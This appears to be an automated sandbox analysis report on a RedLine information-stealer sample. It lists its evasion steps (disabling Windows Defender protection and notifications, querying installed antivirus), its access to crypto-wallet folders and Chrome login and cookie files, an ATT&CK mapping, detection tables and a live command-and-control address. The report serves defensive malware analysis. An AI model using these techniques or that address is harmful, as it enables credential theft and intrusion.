Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_008D5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_008D5467
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_008D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_008D2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe; Code function: 1_2_00A02390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00A02390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe; Code function: 2_2_00A92390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00A92390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Thread delayed: delay time: 922337203685477
Source: bvr38xq.exe, 00000004.00000003.396213666.000000000147B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_008D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_008D2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_008D6F40 SetUnhandledExceptionFilter,0_2_008D6F40
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_008D6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008D6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe; Code function: 1_2_00A06F40 SetUnhandledExceptionFilter,1_2_00A06F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe; Code function: 1_2_00A06CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A06CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe; Code function: 2_2_00A96F40 SetUnhandledExceptionFilter,2_2_00A96F40
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe; Code function: 2_2_00A96CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00A96CF0

HIPS / PFW / Operating System Protection Evasion

Source: atn32.exe.2.dr, Program.cs; Reference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
Source: bvr38xq.exe.2.dr, MemoryImport.cs; Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
Source: 3.0.atn32.exe.230000.0.unpack, Program.cs; Reference to suspicious API methods: ('OpenProcessToken', 'OpenProcessToken@advapi32.dll')
Source: 4.0.bvr38xq.exe.d70000.0.unpack, MemoryImport.cs; Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibraryA@kernel32.dll')
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_008D18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_008D18A3
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_008D7155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_008D7155
Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_008D2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_008D2BFB
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe; Code function: 3_2_00007FF815F5077D GetUserNameA,3_2_00007FF815F5077D

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe; Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe; Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: bvr38xq.exe, 00000004.00000003.396213666.000000000147B000.00000004.00000020.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000003.396213666.0000000001453000.00000004.00000020.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.397413119.000000000147C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 4.0.bvr38xq.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.faC80kI.exe.4430c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.faC80kI.exe.4430c20.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: bvr38xq.exe PID: 1240, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, type: DROPPED
Source: Yara match; File source: 0.3.file.exe.515f220.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.3.file.exe.515f220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000003.305059839.00000000050CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: ElectrumE#
Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: JaxxE#
Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: %appdata%\Ethereum\wallets
Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: ExodusE#
Source: bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: EthereumE#
Source: bvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: Yara match; File source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: bvr38xq.exe PID: 1240, type: MEMORYSTR

Remote Access Functionality

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 4.0.bvr38xq.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.faC80kI.exe.4430c20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.3.faC80kI.exe.4430c20.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000003.306466167.000000000442E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.331124097.0000000000D72000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: bvr38xq.exe PID: 1240, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe, type: DROPPED

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts | 221 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
| Default Accounts | 12 Native API | 1 Windows Service | 2 Bypass User Access Control | 11 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 3 Data from Local System | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | 1 Access Token Manipulation | 1 Timestomp | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | 1 Service Execution | Logon Script (Mac) | 1 Windows Service | 1 DLL Side-Loading | NTDS | 127 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | 1 Process Injection | 2 Bypass User Access Control | LSA Secrets | 331 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Masquerading | Cached Domain Credentials | 11 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | 231 Virtualization/Sandbox Evasion | DCSync | 231 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |
| Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Rundll32 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact |

[Behavior graph: ID 803862, sample file.exe, start date 10/02/2023, architecture WINDOWS, score 100]

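| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| file.exe | 69% | ReversingLabs | Win32.Trojan.RedLine | |
| file.exe | 59% | Virustotal | | Browse |
| file.exe | 100% | Avira | HEUR/AGEN.1252166 | |
| file.exe | 100% | Joe Sandbox ML | | |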

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe | 100% | Avira | HEUR/AGEN.1252166 | |
| C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe | 100% | Avira | HEUR/AGEN.1252166 | |
| C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe | 100% | Avira | HEUR/AGEN.1252166 | |
| C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\IXP000.TMP\fxV11fe.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\IXP001.TMP\faC80kI.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe | 79% | ReversingLabs | Win32.Spyware.RedLine | |
| C:\Users\user\AppData\Local\Temp\IXP000.TMP\doa18JW.exe | 82% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\IXP001.TMP\cEB8028.exe | 32% | Virustotal | | Browse |
| C:\Users\user\AppData\Local\Temp\IXP002.TMP\atn32.exe | 85% | ReversingLabs | ByteCode-MSIL.Trojan.Disabler | |
| C:\Users\user\AppData\Local\Temp\IXP002.TMP\bvr38xq.exe | 96% | ReversingLabs | ByteCode-MSIL.Trojan.RedLine | |

| Source | Detection | Scanner | Label | Link | Download |
| --- | --- | --- | --- | --- | --- |
| 0.0.file.exe.8d0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File |
| 1.2.fxV11fe.exe.a00000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File |
| 2.2.faC80kI.exe.a90000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File |
| 1.3.fxV11fe.exe.50f1820.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | | Download File |
| 4.0.bvr38xq.exe.d70000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File |
| 1.0.fxV11fe.exe.a00000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File |
| 0.2.file.exe.8d0000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File |
| 2.0.faC80kI.exe.a90000.0.unpack | 100% | Avira | HEUR/AGEN.1252166 | | Download File |

No Antivirus matches

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| http://tempuri.org/Entity/Id12Response | 0% | URL Reputation | safe | |
| http://tempuri.org/ | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id2Response | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id21Response | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id9 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id8 | 0% | URL Reputation | safe | |
| 193.233.20.11:4131 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id5 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id4 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id7 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id6 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id19Response | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id15Response | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id6Response | 0% | URL Reputation | safe | |
| https://api.ip.sb/ip | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id9Response | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id20 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id21 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id22 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id1Response | 0% | URL Reputation | safe | |
| http://go.mic | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id10 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id11 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id12 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id16Response | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id13 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id14 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id15 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id16 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id17 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id18 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id5Response | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id19 | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id10Response | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id8Response | 0% | URL Reputation | safe | |
| http://tempuri.org/Entity/Id17Response | 0% | URL Reputation | safe | |

No contacted domains info

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| 193.233.20.11:4131 | true | URL Reputation: safe | unknown |

| Name | Source | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2005/02/sc/sct | bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP | bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://duckduckgo.com/chrome_newtab | bvr38xq.exe, 00000004.00000002.401601537.000000000416F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000420A000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000043F1000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004288000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000032B4000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000041ED000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003228000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003459000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.00000000042E9000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004383000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004306000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000426B000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003340000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.00000000033CC000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.0000000004366000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| https://duckduckgo.com/ac/?q= | bvr38xq.exe, 00000004.00000002.401601537.000000000418C000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary | bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://tempuri.org/Entity/Id12Response | bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://tempuri.org/ | bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://tempuri.org/Entity/Id2Response | bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | bvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmp | false |
                                          high
                                          http://tempuri.org/Entity/Id21Responsebvr38xq.exe, 00000004.00000002.398193743.000000000355E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id9bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmp, bvr38xq.exe, 00000004.00000002.398193743.0000000003466000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDbvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://tempuri.org/Entity/Id8bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tempuri.org/Entity/Id5bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Preparebvr38xq.exe, 00000004.00000002.398193743.000000000319F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://tempuri.org/Entity/Id4bvr38xq.exe, 00000004.00000002.398193743.0000000003111000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
